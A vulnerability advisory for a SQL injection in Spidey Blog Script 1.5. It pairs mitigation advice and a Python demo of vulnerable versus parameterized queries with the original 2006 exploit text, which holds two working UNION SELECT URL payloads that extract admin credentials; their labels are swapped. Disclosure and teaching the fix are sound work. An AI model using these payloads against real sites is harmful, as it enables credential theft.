Vendor: Spidey Blog Script
Author: ASIANEAGLE
CVSS: 7.5 (HIGH)
CWE-89: SQL Injection
Product Name: Spidey Blog Script
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Spidey Blog Script <== 1.5 (tr) SQL Injection Vulnerability

A SQL injection vulnerability exists in Spidey Blog Script version 1.5 (tr). An attacker can exploit this vulnerability to gain access to the admin credentials by sending a specially crafted HTTP request to the vulnerable application. The request contains malicious SQL statements that are executed in the backend database.

Mitigation:

Developers should use parameterized queries to prevent SQL injection attacks. Input validation should also be used to detect malicious input.
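The advisory's `pid` parameter is concatenated straight into the SQL text, which is what lets a `UNION SELECT` over the member table ride along. The following is an added example (not the Spidey Blog Script code, which is classic ASP) that rebuilds the flaw and the two mitigations above in Python against an in-memory SQLite stand-in: a vulnerable handler beside an integer-validated, parameterized one. The table and column names `uyeler`, `kullanici_adi` and `sifre` come from the advisory's query; the project table `projeler`, its extra columns and all row values are constructed.

```python
import sqlite3
from urllib.parse import unquote

# Constructed stand-in for the blog's database. The 7-column project table
# matches the column count the advisory's UNION payload needs; row values are made up.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE projeler(pid INTEGER, baslik TEXT, c2 TEXT, c3 TEXT, c4 TEXT, c5 TEXT, c6 TEXT);
        CREATE TABLE uyeler(id INTEGER, kullanici_adi TEXT, sifre TEXT);
        INSERT INTO projeler VALUES (1, 'first project', '', '', '', '', '');
        INSERT INTO uyeler VALUES (1, 'admin', 's3cret-placeholder');
    """)
    return db

def show_project_vulnerable(db, pid):
    # Mirrors the flaw: the raw query-string value becomes part of the SQL text,
    # so a crafted pid changes the query instead of being compared as a number.
    sql = "SELECT * FROM projeler WHERE pid=" + pid
    return db.execute(sql).fetchall()

def show_project_fixed(db, pid):
    # Input validation: pid must be a plain integer; anything else is rejected
    # (a real handler would log the rejection and return a 400).
    if not pid.lstrip("-").isdigit():
        raise ValueError("rejected non-numeric pid: %r" % pid)
    # Parameterized query: the value is bound separately from the SQL text,
    # so it can never be parsed as SQL.
    return db.execute("SELECT * FROM projeler WHERE pid=?", (int(pid),)).fetchall()

# The decoded value from the advisory's request (constructed copy of the URL parameter).
PAYLOAD = unquote("-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201")

def fixed_handler_blocks_payload(db):
    """True when the hardened handler refuses the advisory's pid value."""
    try:
        show_project_fixed(db, PAYLOAD)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    db = build_db()
    print("vulnerable handler returned:", show_project_vulnerable(db, PAYLOAD))
    print("fixed handler blocks payload:", fixed_handler_blocks_payload(db))
```

Run it and the vulnerable handler returns a row whose sixth column is the member table's `sifre` value, while the fixed handler rejects the same input before any SQL runs.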
Source

Exploit-DB raw data:

###############################################################
#Spidey Blog Script <== 1.5 (tr) SQL Injection Vulnerability  #
#Author : ASIANEAGLE                                          #
#Site   : www.asianeagle.org                                  #
#Contact: admin@asianeagle.org                                #
###############################################################
#Risk   : High
#Download Link Of Spidey Blog : http://www.aspindir.com/Kategoriler/ASP/bloglar


#Exploit;
#Admin Nick;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201

#Admin Password;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201


#Greetz: Str0ke
Forever milw0rm ;)

# milw0rm.com [2006-08-14]